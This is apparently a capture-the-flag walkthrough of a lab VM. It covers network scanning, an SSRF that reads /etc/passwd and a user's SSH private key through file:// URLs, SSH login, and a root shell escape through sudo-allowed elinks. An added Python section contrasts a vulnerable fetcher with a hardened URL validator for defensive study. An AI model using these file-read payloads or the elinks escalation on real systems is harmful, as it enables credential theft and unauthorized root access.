Group member's box - Anjy

  1. Information gathering
  2. Port 80
  3. Privilege escalation

Information gathering

Use arp-scan -l to find the target's address:

┌──(root㉿kali)-[~/Desktop/tmp]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:ff:66:80, IPv4: 192.168.31.129
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.31.1 0a:00:27:00:00:11 (Unknown: locally administered)
192.168.31.2 08:00:27:da:a9:b6 PCS Systemtechnik GmbH
192.168.31.147 08:00:27:e8:2b:5e PCS Systemtechnik GmbH

3 packets received by filter, 0 packets dropped by kernel

192.168.31.147 is the target IP; next, scan its ports with nmap:

┌──(root㉿kali)-[~/Desktop/tmp]
└─# nmap 192.168.31.147
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-19 04:25 EDT
Nmap scan report for 192.168.31.147
Host is up (0.0014s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:E8:2B:5E (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 6.88 seconds

Port 80

Port 80 serves a web page with an SSRF vulnerability: POSTing the parameter url=file:///etc/passwd returns the file's contents base64-encoded.

This reveals a user named welcome. There is no id_rsa in that user's home directory, so read /etc/ssh/sshd_config to see which key types the host uses:

#HostKey /etc/ssh/ssh_host_rsa_key
#HostKey /etc/ssh/ssh_host_ecdsa_key
#HostKey /etc/ssh/ssh_host_ed25519_key

Then try id_rsa, id_ecdsa and id_ed25519 in turn; id_ed25519 turns out to exist:

url=file:///home/welcome/.ssh/id_ed25519

With the private key in hand, you can log in over SSH.
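
The SSRF in this section comes down to a server-side fetcher that passes the client-supplied url straight to a URL library, which happily handles file://. The following added example (my own code, not the box's or the original post's) contrasts that vulnerable pattern with a validated fetcher: fetch_unsafe, validate_fetch_url, fetch_hardened and the sample file content are constructions for illustration, and hostname resolution plus re-check (against DNS rebinding) is noted but left out of scope.

```python
import base64
import ipaddress
import os
import tempfile
import urllib.error
import urllib.parse
import urllib.request

ALLOWED_SCHEMES = {"http", "https"}


def fetch_unsafe(url):
    """The vulnerable pattern: fetch whatever URL the client sends and
    return the bytes base64-encoded. urllib's default opener includes a
    file:// handler, so url=file:///etc/passwd reads a local file."""
    with urllib.request.urlopen(url) as resp:
        return base64.b64encode(resp.read()).decode()


def validate_fetch_url(url):
    """Return (ok, reason). Rejects non-http(s) schemes and literal
    non-public addresses. A hostname passes here but must be resolved
    and the resulting address re-checked right before connecting
    (DNS rebinding); that step is out of scope for this example."""
    parts = urllib.parse.urlsplit(url)
    scheme = parts.scheme.lower()
    if scheme not in ALLOWED_SCHEMES:
        return False, "scheme %r not allowed" % scheme
    host = parts.hostname
    if not host:
        return False, "missing host"
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        return True, "hostname; resolve and re-check the address before connecting"
    if (addr.is_private or addr.is_loopback or addr.is_link_local
            or addr.is_reserved or addr.is_multicast or addr.is_unspecified):
        return False, "address %s is not public" % addr
    return True, "ok"


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Refuse redirects so a public URL cannot bounce to an internal one."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        raise urllib.error.HTTPError(req.full_url, code, "redirects disabled",
                                     headers, fp)


def fetch_hardened(url, timeout=5):
    """Validated fetch: scheme and address checked, redirects disabled,
    timeout bounded. Same base64 response format as the unsafe version."""
    ok, reason = validate_fetch_url(url)
    if not ok:
        raise ValueError(reason)
    opener = urllib.request.build_opener(_NoRedirect)
    with opener.open(url, timeout=timeout) as resp:
        return base64.b64encode(resp.read()).decode()


def demo_local_file_read():
    """Constructed demo: write a sample file, show that the unsafe fetcher
    returns it through file://, and that the validator rejects that URL."""
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as f:
        # constructed passwd-style line, not data from the box
        f.write("welcome:x:1000:1000::/home/welcome:/bin/bash\n")
        path = f.name
    try:
        url = "file://" + path
        leaked = base64.b64decode(fetch_unsafe(url)).decode()
        ok, reason = validate_fetch_url(url)
        return leaked, ok, reason
    finally:
        os.unlink(path)


if __name__ == "__main__":
    leaked, ok, reason = demo_local_file_read()
    print("unsafe fetcher returned:", leaked.strip())
    print("validator verdict:", ok, reason)
    for u in ("http://127.0.0.1/", "http://169.254.169.254/latest/",
              "http://example.com/"):
        print(u, validate_fetch_url(u))
```

The scheme allow-list is what closes the file:// read shown above; the address checks and redirect refusal address the other common SSRF outcomes (loopback services, link-local metadata endpoints, redirect bounces), which the box does not exercise but the same fetcher would expose.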

Privilege escalation

┌──(root㉿kali)-[~/Desktop/tmp]
└─# ssh welcome@192.168.31.147 -i id
Linux Anjv 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Apr 19 04:31:17 2025 from 192.168.31.129
welcome@Anjv:~$

sudo -l shows that elinks can be run as root. That alone allows reading root.txt directly, and indeed reading or writing any file, but the simplest route is to open the elinks terminal UI and press Esc -> File -> OS shell,

which drops you into a root shell.
